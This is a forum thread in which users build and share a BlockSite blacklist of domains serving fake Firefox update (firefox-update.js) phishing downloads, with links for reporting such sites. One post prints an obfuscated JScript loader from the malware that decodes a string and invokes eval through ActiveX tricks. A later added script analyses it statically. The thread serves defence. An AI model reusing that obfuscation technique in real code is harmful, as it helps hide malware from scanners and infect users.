
Topic: Black List to Block Websites - Firefox - Please add others to blacklist


DaveLembke

Sharing this here in case anyone is interested in adding a Black List to their Firefox to block trouble spots on the internet from ever being navigated to from Firefox.

I added BlockSite add-on to my Firefox browsers on my systems and created a short blacklist that I am going to build up and add to.

Here is the add-on I am using that works well. Easy to set up and manage: https://addons.mozilla.org/en-US/firefox/addon/blocksite/

Here is my current black list:

Quote
[BlockSite]
*eekumyoutube*
*meihitravelfeeder*
*liirawynagrodzenia*
*eatadresumedropbox*

I started use of this BlockSite add-on because some computers both at home and elsewhere have had Phishing Attacks trying to get people to download and run a firefox-update.js ranging in sizes of ( 6.5kb, 338kb, and 482kb ). Screenshot below shows an example of this Phishing Attack.

Worst of all is that MalwareBytes Free edition, Microsoft Security Essentials, and McAfee Free edition all say that these .js files are safe, no problems detected. Yet looking at the source code in the script it has malicious intent to infect Firefox.

Here is a code snippet from a 6.5kb fake firefox update:

Code:
var lubjgros=odubo+lni+ksfyw+fivu+cqe+asq;
   function loa(a){return a;};
   var rrr="ev";
   var sir="Scr"+"ipt"+"ing."+loa("Di"+"ct"+loa("i"+"o"+"n"+"a"+"r"+"y"));
   var d = new ActiveXObject(sir);
   d.Add("a","3");
   var t=+d.Item("a");
   var rjdmefbshp="";
   var trurghaaq=t;
   var rrooaufpn=lubjgros["sp"+"l"+"i"+"t"]("");
   var am="gth";
   for (a=0;a<rrooaufpn["len"+am];
   a +=trurghaaq){      rjdmefbshp=rjdmefbshp+rrooaufpn[a];}
   var ikvcfnino="";
   if(t==3){ikvcfnino=rrr+"a";}
   if(t==3){ikvcfnino +="l";}
   var iehtbcmcc=this;
   var hkthfwmtez=iehtbcmcc[ikvcfnino];
   var iepizmswd=hkthfwmtez;
   iepizmswd(rjdmefbshp);

If anyone else decides to use this Block Site Add-on and creates a black list, please share your blacklist here so we can share and protect ourselves from this by expanding our blacklists.

Years ago I went the route of setting up white lists but the problem with that is that it was a pain having to add each and every new website that I want to navigate to to a list of trusted sites. So I went years without blockers, but this Phishing issue that started in June 2016 and recently has been more frequent has been really annoying. All systems are clean of infections and it seems as though the thing in common with each phishing attack attempt has been that Facebook is open and something there, an ad or flash game or something has a random chance of passing a pop up of this phishing attack. The URL path acts as a 1 time shot to infect and then it becomes a dead link. If you try to go back to the URL by copying and pasting it to try to go back to it later, you get a white screen and not this phishing attack with a firefox-update.js download that wants you to click to download and run.

Hoping this helps to protect others. I will add updates here to my Block Site black list if anyone is interested in blocking trouble maker sites.

Below is an example of the phishing attack and then when navigating to the site later it hides itself so you can't prove to Mozilla that they have malicious intent. I have been passing the bad URLs also to Mozilla to be notified. Not sure if they can do anything about it, but at least they are then made aware of site locations that are phishing to infect people trying to trick people into infecting their browsers.
Here is the link to notify Mozilla of bad sites: https://www.mozilla.org/en-US/about/legal/fraud-report/

Also Google has a way to get notified as well for malicious sites:

Quote
If you are reporting a site distributing malware or engaged in phishing, please also report the site to the Google Safe Browsing Team.


 https://safebrowsing.google.com/safebrowsing/report_badware/?hl=en

Note: The reporting of bad domains to Google has to be done before adding that bad site to Block Site black list. I had to go back and delete the block for the latest phishing attack in order to submit the URL to Google. Then go back and add the entry to black list the bad domain. So if reporting trouble maker sites, you have to do that first before setting the rule to block the bad site in the black list. ::)


[attachment deleted by admin to conserve space]
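
A static triage sketch for the kind of script quoted in the post above (an added example, not part of the original thread and not the poster's code): it folds split string literals and identity-function wrappers without executing anything, then flags what becomes readable. The sample input is constructed to mirror the quoted snippet, and the names `foldStrings`, `everyNth` and `triage` are hypothetical.

```javascript
// Static triage only: the sample is treated as text and never executed.
// Constructed sample mirroring the tricks in the quoted snippet.
const SAMPLE = [
  'function loa(a){return a;};',
  'var sir="Scr"+"ipt"+"ing."+loa("Di"+"ct"+loa("i"+"o"+"n"+"a"+"r"+"y"));',
  'var d = new ActiveXObject(sir);',
  'var parts=blob["sp"+"l"+"i"+"t"]("");',
  'var g=this; var fn=g[name]; fn(decoded);',
].join('\n');

// Collapse "a"+"b" chains and calls to identity helpers (function f(x){return x;}).
// Regex-based heuristic, not a JavaScript parser.
function foldStrings(src) {
  const ids = [...src.matchAll(
    /function\s+(\w+)\s*\(\s*(\w+)\s*\)\s*\{\s*return\s+\2\s*;?\s*\}/g)].map(m => m[1]);
  let out = src, prev, folds = 0;
  do {
    prev = out;
    out = out.replace(/"([^"\\]*)"\s*\+\s*"([^"\\]*)"/g,
      (_, a, b) => { folds++; return `"${a}${b}"`; });
    for (const f of ids)
      out = out.replace(new RegExp(`\\b${f}\\(\\s*("[^"\\\\]*")\\s*\\)`, 'g'), '$1');
  } while (out !== prev);
  return { out, folds };
}

// Rebuild the string the every-Nth-character loop assembles, for reading only.
function everyNth(text, step) {
  let s = '';
  for (let i = 0; i < text.length; i += step) s += text[i];
  return s;
}

function triage(src) {
  const { out, folds } = foldStrings(src);
  const findings = [];
  if (/\bActiveXObject\b/.test(out)) findings.push('ActiveXObject');
  if (/"Scripting\.Dictionary"/.test(out)) findings.push('Scripting.Dictionary');
  // "x = this;" followed by x[someVar] is a function looked up by computed name.
  const alias = out.match(/\b(\w+)\s*=\s*this\s*;/);
  if (alias && new RegExp(`\\b${alias[1]}\\s*\\[\\s*\\w+\\s*\\]`).test(out))
    findings.push('computed lookup on global object');
  if (folds >= 5) findings.push(`split literals (${folds} folds)`);
  return { findings, folded: out };
}

console.log(triage(SAMPLE).findings, everyNth('a12b34c56', 3));
```

Plain keyword matching on the raw file finds neither `Scripting.Dictionary` nor `split`; both only appear once the literals are folded.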

DaveLembke

Here is the latest blacklist I have if anyone is using the BlockSite Addon:

Just copy and paste this below into a text file and import it to the Block Site Addon... These are Firefox Fake Update Phishing sites that have been found, and the phishing seems to originate through Facebook somehow. Computer shows clean with Malwarebytes and AVG virus scan.

Code:
[BlockSite]
*eekumyoutube.*,Phishing Attacker
*meihitravelfeeder.*,Phishing Attacker
*liirawynagrodzenia.*,Phishing Attacker
*eatadresumedropbox*,Phishing Attacker
*phaigfinancial-hub.*,Phishing Attacker
*vooshortakweb.*,phishing attack
*ijualhalfpintgentleman.*,phishing attack
*nuriuek-online.*,phishing attack

patio

There's another 1 Dave...wonder if you've seen it...How to Hide Your IP...I'll grab the link if you like...
" Anyone who goes to a psychiatrist should have his head examined. "

DaveLembke

Another one... same type of phishing... This time different computer and Yahoo and Computerhope are the only 2 site tabs open. My wife uses Yahoo a lot, so maybe it's coming through Yahoo vs Facebook.  :-\

I was looking through Yahoo News and then it popped up after a few minutes reading into an article on raising of a sunken Korean ship. So it must be linked to an ad banner that triggers after a timeout interval to change maybe...

roohohotbuzz4u . net

Latest BlockSite Export with this new one added. Makes me wonder how many of these they have going that they are fishing from with same phishing attack method.  ::)
Code:
[BlockSite]
*eekumyoutube.*,Phishing Attacker
*meihitravelfeeder.*,Phishing Attacker
*liirawynagrodzenia.*,Phishing Attacker
*eatadresumedropbox*,Phishing Attacker
*phaigfinancial-hub.*,Phishing Attacker
*vooshortakweb.*,phishing attack
*ijualhalfpintgentleman.*,phishing attack
*nuriuek-online.*,phishing attack
*roohohotbuzz4u.*,phishing attack


[attachment deleted by admin to conserve space]